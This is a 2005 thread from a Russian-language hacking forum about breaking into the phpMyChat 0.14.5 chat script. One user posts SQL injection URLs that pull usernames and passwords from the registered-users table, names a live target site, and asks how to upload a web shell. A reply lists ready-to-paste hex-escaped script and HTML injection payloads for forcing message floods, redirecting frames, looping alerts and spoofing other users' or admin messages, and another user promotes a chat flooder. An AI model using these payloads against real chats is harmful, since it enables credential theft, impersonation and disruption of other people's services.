ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpMyChat 0.14.5
  #1  
Старый 30.12.2005, 23:06
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию phpMyChat 0.14.5

Слыхал что это чюдо очень дырявое... пробывал
http://Target/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20usern ame,null,null,null%20FROM%20%20c_reg_users%20/*
http://Target/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20passw ord,null,null,null%20FROM%20%20c_reg_users%20/*
и так не катит... короче какие есть уязвимости? =)
З.Ы.
ссылка на чат
http://fof.od.ua/chat/index.php
оо... Чють не забыл
http://fof.od.ua/chat/chat/
такой глюк еще есть!
реально ли залить шелл туда?
если да то как?

Последний раз редактировалось Grema; 30.12.2005 в 23:13..
 
Ответить с цитированием

  #2  
Старый 30.12.2005, 23:18
k0ldun
Новичок
Регистрация: 28.12.2005
Сообщений: 27
Провел на форуме:
167272

Репутация: 2
По умолчанию

ну вот,,, там фильтрация идет : < >,, жду + к репутации/// ещё можешь на секюр-лабе посмотреть
Цитата:
ФЛУД
\x3cscript\x3ewindow.parent.window.input.document. MsgForm.M.value="текст!!!!";window.parent.win dow.input.document.MsgForm.submit()\x3c/script\x3e\ ...\x3center/



МЕНЯЕТ КНОПКУ
\x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.forms['MsgForm'].elements['sendForm'].value="ТЕКСТ"\x3b\x3c/script\x3e\x3c/font\x3e


ВСТАВЛЯЕТ МУЗЫКУ
\x3cBGSOUND SRC="http\x3a//http://www2.music.lbn.ru//cgi-bin/banner/40?10780&login=midiru&referer=http%3A%2F%2Fwww.adn et.ru%2Fcgi-bin%2Fiframe%2Fmidi" LOOP="-1" BALANCE"-5000" VOLUME="0"\x3e
\x3cBGSOUND SRC="http\x3a//АДРЕС" LOOP="-1" BALANCE"-5000" VOLUME="0"\x3e


ВЫВОДИТ ОКНО
\x3cscript language="JavaScript"\x3ewindow.alert("ТЕКСТ" )\x3b\x3c/script\x3e\x3cfo nt\ x3e\x3c/font\x3e
\x3cscript language="JavaScript" \x3e for (x=1\x3bx \x3c100000\x3b++x) { alert(x)\x3b } while (x\x3e0) \x3b\x3c/script\x3e\x3c/font\x3e\x3c/FONT\x3e\x3c/P\x3e


ВСТАВЛЯЕТ КАРТИНКУ
\x3cimg src="http\x3a//cards.yandex.ru/cards/66163134a1a9adf6e22458864dadc176.jpg" name="imaga"\x3e
195.161.118.159/2838/2838338_11.gif
195.161.118.159/2837/2837048_24.gif

ИЗМЕНЯЕТ РАЗМЕР ШРИФТА
\x3cfont size="2px"\x3e\x3c/font\x3e


ВСТАВЛЕННЫЙ ТЕКСТ
\x3cfont color=`#dc0799` size=9\x3e ТЕКСТ \x3cfont color=`#dc0799` size=2\x3e
\x3cfont color=`#000000` size=9\x3e ТЕКСТ \x3cfont color=`#000000` size=3\x3e


ПЕРЕВОД НА САЙт
\x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.location="http\x3a//www.yandex.ru"\x3b\x3c/script\x3e\x3cfont\x3e\x3c/font\x3e
\x3cscript language="JavaScript"\x3ewindow.parent.frames['input'].window.document.location="http\x3a//www.ya.ru"\x3b\x3c/script\x3e\x3cfont\x3e\x3c/font\x3e


ТЕКСТ ДВИГАЕТСЯ
\x3cmarquee behavior=`alternate` bgcolor=`black`\x3e\x3c/marquee

ЗАЧЕРКИВАЕТ ВСЕ И ДВИЖЕТСЯ
\x3ch1 \x3e ТЕКСТ \x3c/h1 \x3e\x3cmarquee behavior=`alternate` scrollamount=`15` width=`650` direction=`up`\x3e \x3cs \x3e \x3csmall \x3e


ВСТВЛЯЕШЬ ЛЮБОЙ НИК И ПИШЕШЬ, ЧТО ХОЧЕШЬ)
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPAN CLASS="time"\x3e00\x3a00\x3a00\x3c/SPAN\x3e \x3cB\x3e[\x3cA HREF="#" onClick="window.parent.АДМИНClick('АДМИ', true)\x3b return false" CLASS="sender"\x3eDama_Пик\x3c/A\x3e]\x3cBDO dir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e \x3cFONT\x3e
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPANCLASS="time"\x3e02\x3a56\x3 a54\x3c/SPAN\x3e \x3cB\x3e[\x3cAHREF="#"onClick="window.parent.userClick('Lel a',true)\x3b returnfalse" CLASS="sender"\x3eИМЯ\x3c/A\x3e]\x3cBDOdir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e \x3cFONT\x3e ТЕКСТ\x3c/font\


ШРИФТ ВЫКИДЫВАЕТ ИЗ ВРЕМЕНИ
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPAN CLASS="time"\x3e00\x3a00\x3a00\x3cSPAN CLASS="notify" HREF="#" onClick="window.parent.АДМИНClick('M[@]D',notify)\x3b return false" CLASS="sender"\x3eПривет всем\x3c/A\x3e\x3cBDO dir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e \x3cFONT\x3e


Изменяет вид шрифта
\x3cfont face="Comic Sans MS"\x3e\x3c/font\x3e Lucida Console


замена фона
\x3cbody background="http\x3a//АДРЕС"\x3e

кнопка
\x3cINPUT type=submit value="Привет!" name INPUT\x3e

Фиг знает что такое
\x3cbr\x3e\x3cP CLASS="msg"\x3e\x3cSPANCLASS="time"\x3e00\x3a00\x3 a00\x3cSPAN CLASS="notify"HREF="#"onClick="window.parent.АД ИНClick('M[@]D',notify)\x3b returnfalse" CLASS="sender"\x3eа ТЕКСТ\x3c/A\x3e\x3cBDO dir="LTR"\x3e\x3c/BDO\x3e\x3c/B\x3e\x3cFONT\x3e

Последний раз редактировалось k0ldun; 30.12.2005 в 23:21..
 
Ответить с цитированием

  #3  
Старый 30.12.2005, 23:21
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию

А залить шелл можно както?
 
Ответить с цитированием

Флудер
  #4  
Старый 02.01.2006, 12:02
AdvLamer
Участник форума
Регистрация: 01.01.2006
Сообщений: 262
Провел на форуме:
1718386

Репутация: 686
По умолчанию Флудер

Цените мой флудер для phpmychat
http://advlamer.narod.ru >>> Флудер для чата
 
Ответить с цитированием

  #5  
Старый 05.01.2006, 11:46
Gisher
Познающий
Регистрация: 30.06.2005
Сообщений: 43
Провел на форуме:
92284

Репутация: 2
По умолчанию

Цитата:
Сообщение от AdvLamer  
Цените мой флудер для phpmychat
http://advlamer.narod.ru >>> Флудер для чата
Молодец)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Существуют ли инекции в phpMyChat? Antihack Чаты 3 19.11.2005 07:03
Можно ли взломать phpMyChat? Antihack Чаты 1 16.11.2005 14:08
phpmychat koldun Чаты 4 29.10.2005 22:55
phpmychat azeri_hacker Чаты 0 13.05.2005 18:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ